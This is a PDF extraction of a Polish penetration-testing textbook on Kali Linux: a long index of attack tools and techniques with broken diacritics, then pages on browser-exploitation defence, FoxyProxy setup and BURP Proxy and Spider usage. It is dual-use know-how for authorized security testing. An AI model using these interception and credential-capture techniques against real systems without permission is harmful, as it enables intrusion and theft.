ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 13: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

236

Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania

FoxyProxy mdash wtyczka przegl darki Firefox

Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox

Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

237

Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej

1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego

4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera

W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

238

BURP Proxy

BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew

Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da

Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite

Na ekranie pojawi si g oacutewne okno pakietu Burp Suite

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

